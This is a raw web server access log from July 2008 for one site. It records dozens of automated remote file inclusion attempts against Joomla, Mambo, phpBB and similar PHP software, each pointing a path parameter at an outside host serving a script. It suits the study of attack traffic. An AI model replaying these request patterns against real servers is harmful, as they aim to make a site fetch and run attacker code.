193.198.217.3 - - [06/Jul/2008:10:48:01 -0700] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:48:01 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:48:07 -0700] "GET /logs/access_071230.log/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:48:11 -0700] "GET /?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 200 18397 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:48:14 -0700] "GET /logs/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 200 54992 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:48:17 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.3.32.28 - - [06/Jul/2008:10:48:21 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:10:48:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.209.166 - - [06/Jul/2008:10:48:49 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.1.61.39 - - [06/Jul/2008:10:48:58 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:10:49:11 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 200 3694 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:10:49:12 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:49:25 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.805" "www.dmulk.com"
202.49.5.17 - - [06/Jul/2008:10:49:32 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:49:34 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:49:40 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:49:40 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:49:41 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:10:49:52 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:10:49:53 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:10:49:55 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:50:00 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.805" "www.dmulk.com"
201.26.8.252 - - [06/Jul/2008:10:50:08 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.154.255.5 - - [06/Jul/2008:10:50:38 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.71.249.147 - - [06/Jul/2008:10:50:43 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:50:43 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:50:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:51:09 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:51:09 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:51:16 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:51:17 -0700] "GET /logs/access_080120.log/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:51:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:51:22 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:51:27 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:51:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:51:37 -0700] "GET /logs/access_080215.log/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:51:45 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.219.5.233 - - [06/Jul/2008:10:52:00 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://raru.freetzi.com/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.219.5.233 - - [06/Jul/2008:10:52:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://raru.freetzi.com/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.219.5.233 - - [06/Jul/2008:10:52:01 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://raru.freetzi.com/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:52:33 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:52:34 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:53:15 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:53:39 -0700] "GET /logs/access_080421.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:53:39 -0700] "GET /logs/access_080227.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:53:39 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:53:43 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 200 18531 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:53:54 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:53:54 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:53:55 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:54:03 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:54:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:17 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:18 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:18 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:21 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:21 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:54:22 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:54:35 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:54:36 -0700] "GET //includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:54:36 -0700] "GET /logs//includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:54:45 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:54:45 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:54:52 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:54:52 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:10:54:57 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:10:54:57 -0700] "GET /logs/index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:55:05 -0700] "GET /logs/access_080215.log/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:55:15 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:55:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.199.19 - - [06/Jul/2008:10:55:21 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.199.19 - - [06/Jul/2008:10:55:21 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.199.19 - - [06/Jul/2008:10:55:21 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.135.118 - - [06/Jul/2008:10:55:35 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [06/Jul/2008:10:55:36 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [06/Jul/2008:10:55:36 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [06/Jul/2008:10:55:36 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:55:42 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:55:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:55:43 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:55:49 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:55:49 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:55:49 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.219.5.233 - - [06/Jul/2008:10:56:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://raru.freetzi.com/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:56:03 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:56:03 -0700] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:56:33 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:56:34 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:56:34 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:56:35 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:56:49 -0700] "GET /logs/access_080315.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.186.4.164 - - [06/Jul/2008:10:56:50 -0700] "GET /logs/access_080315.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.199.19 - - [06/Jul/2008:10:57:47 -0700] "GET /logs/access_080315.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:10:57:57 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:10:57:57 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:57:58 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:10:57:58 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:57:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:57:58 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:57:59 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.244.227.3 - - [06/Jul/2008:10:58:10 -0700] "GET /logs//account.php?action=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.244.227.3 - - [06/Jul/2008:10:58:10 -0700] "GET //account.php?action=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:10 -0700] "GET /logs//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:10 -0700] "GET //starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:11 -0700] "GET /logs/access_080103.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:11 -0700] "GET //starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
